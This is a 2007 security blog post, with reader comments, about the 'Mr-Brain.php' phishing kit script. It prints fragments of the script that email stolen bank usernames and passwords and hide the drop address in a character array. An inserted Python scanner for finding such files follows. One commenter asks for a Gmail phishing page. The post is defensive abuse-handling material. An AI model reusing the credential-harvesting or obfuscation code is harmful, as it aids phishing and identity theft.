PreshBlog

Watch out for “Mr-Brain.php” – phishing script

by on May.02, 2007, under Information Security

As well as my normal development duties I deal with some of the incoming abuse reports at work, and recently I’ve dealt with a number of phishing sites which submit data to a script named “Mr-Brain.php”. A quick Google showed no useful results, so I’m posting about it here.

The script gathers the details submitted by the phishing site and emails them off. The actual file seems to change a bit for each spam.

Telltale bits from one of them:


$message .= "--------------HaLiFaX UK Bank Spam ReZulT-----------------------\n";
$message .= "Username: ".$_POST['Username']."\n";
$message .= "Password: ".$_POST['Password']."\n";
[..... removed some lines for brevity.....]
$message .= "---------------Created By yassine.h01------------------------------\n";

It also makes a pretty laughable attempt to hide what email address it’s really sending the info to, by picking characters out of an array:


$ar=array("0"=>"3","1"=>"a","2"=>"w","3"=>"l","4"=>"d","5"=>"i","6"=>"@","7"=>".","8"=>"y","9"=>"h","10"=>"o","11"=>"c","12"=>"m");
$to=$ar['1'].$ar['2'].$ar['2'].$ar['3'].$ar['4'].$ar['5'].$ar['0'].$ar['0'].$ar['0'].$ar['6'].$ar['8'].$ar['1'].$ar['9'].$ar['10'].$ar['10'].$ar['7']
.$ar['11'].$ar['10'].$ar['12'];

… because that will really stop anyone with half a clue seeing what’s going on.

Might well be worth searching your servers for any files named “Mr-Brain.php” as a quick way to locate phishing attempts. A quick find / -name Mr-Brain.php will get you a list of any dodgy sites being hosted, quickly and easily.
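The same style of script also turns up under other filenames, so a sweep on file contents catches more than a sweep on the name. The Python below is an added example, not code from the original post or from any kit: it flags PHP files that pass POSTed credentials to mail() and statically resolves an array-built $to so the drop address can go into the abuse report. The use of PHP's mail(), the regex heuristics and the sample file are assumptions.

```python
import re
import tempfile
from pathlib import Path

# Heuristics taken from the excerpts in this post; tune them for your own servers.
BANNER = re.compile(r"ReZulT|Created\s+By", re.I)
POSTED_CRED = re.compile(r"""\$_POST\[['"](?:user\w*|pass\w*)['"]\]""", re.I)
ARRAY_DEF = re.compile(r"\$(\w+)\s*=\s*array\((.*?)\)\s*;", re.S)
PAIR = re.compile(r"""['"](\w+)['"]\s*=>\s*['"](.*?)['"]""")
TO_EXPR = re.compile(r"\$to\s*=(.*?);", re.S)
TOKEN = re.compile(r"""\$(\w+)\[['"]?(\w+)['"]?\]|(['"])(.*?)\3""")

def resolve_recipient(src):
    """Rebuild a $to assembled from array lookups and literals; None if unresolvable."""
    tables = {name: dict(PAIR.findall(body)) for name, body in ARRAY_DEF.findall(src)}
    expr = TO_EXPR.search(src)
    parts = []
    for name, key, _quote, literal in TOKEN.findall(expr.group(1) if expr else ""):
        value = tables.get(name, {}).get(key) if name else literal
        if value is None:  # lookup into an array this parser did not see
            return None
        parts.append(value)
    return "".join(parts) or None

def scan(root):
    """List (path, has_banner, recipient) for PHP files that mail POSTed credentials."""
    findings = []
    for path in sorted(Path(root).rglob("*.php")):
        src = path.read_text(errors="replace")
        if POSTED_CRED.search(src) and re.search(r"\bmail\s*\(", src):
            findings.append((str(path), bool(BANNER.search(src)), resolve_recipient(src)))
    return findings

# Constructed sample in the shape of the excerpts above (not a real kit file).
SAMPLE = r'''<?php
$message = "---ExAmPlE Bank Spam ReZulT---\nPassword: ".$_POST['Password']."\n";
$ar=array("0"=>"d","1"=>"r","2"=>"o","3"=>"p","4"=>"@","5"=>"e","6"=>"x","7"=>".","8"=>"t","9"=>"s");
$to=$ar['0'].$ar['1'].$ar['2'].$ar['3'].$ar['4'].$ar['5'].$ar['6']
.$ar['7'].$ar['8'].$ar['5'].$ar['9'].$ar['8'];
mail($to, "result", $message);
'''

def demo():
    with tempfile.TemporaryDirectory() as root:
        (Path(root) / "renamed.php").write_text(SAMPLE)
        (Path(root) / "contact.php").write_text("<?php mail($a, $_POST['subject'], $b);")
        return [(Path(p).name, banner, to) for p, banner, to in scan(root)]

if __name__ == "__main__":
    print(demo())
```

Point scan() at a webroot; a hit with no banner and no resolved recipient is worth a manual look rather than an automatic takedown, since sloppy but legitimate forms can match too.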

A quick Google for “yassine.h01” returned a site hosting a large list of pre-made phishing sites… just unzip, change the Mr-Brain.php file with your address, and upload. Reported it, but it’s a Russian host, so not holding my breath.

Have any info to add? Go ahead and leave a comment (please!).


6 Comments for this entry

  • bigpresh

    Another similar looking script I found was named Sitekey.php which was part of a Bank of America phishing site… it looks like it’s either made by the same person, or just modified by someone. It contains “Created By xXMr_SpAmErSxX” in the mail it sends.

    I also saw one called log.php which it seems is designed to steal Hotmail cookies, containing “abdullah00” and “By Mr.ALJoOoKeR”.

  • bigpresh

    Still seeing more Mr-Brain.php scripts, often with different “Created By” lines, including:
    —————Created BY Mr-c/qadir——————————

  • bigpresh

    Update: Googling for “yassine.h01” no longer returns the site hosting pre-made phishing sites, so maybe the host acted on the report and took it down.

  • ShopShield

    Identity theft is certainly a very real thing to deal with and the internet only makes it easier to become a victim. Email phishing scams are everywhere and most people can’t tell the difference between a real site and the fake one. I found this new resource called ShopShield.net. Check it out; they protect your identity while you are online.

  • Hos

    Hey Buddy Can You Plz Give me Phishing Page For Gmail

    Or Send me a script.

    I’m an amateur. So plz Help me

  • David Precious

    @Hos – Heh. Oh dear.

    Here’s your script:


    <?php echo("Go fuck yourself."); ?>

    /me shakes head in disgust.
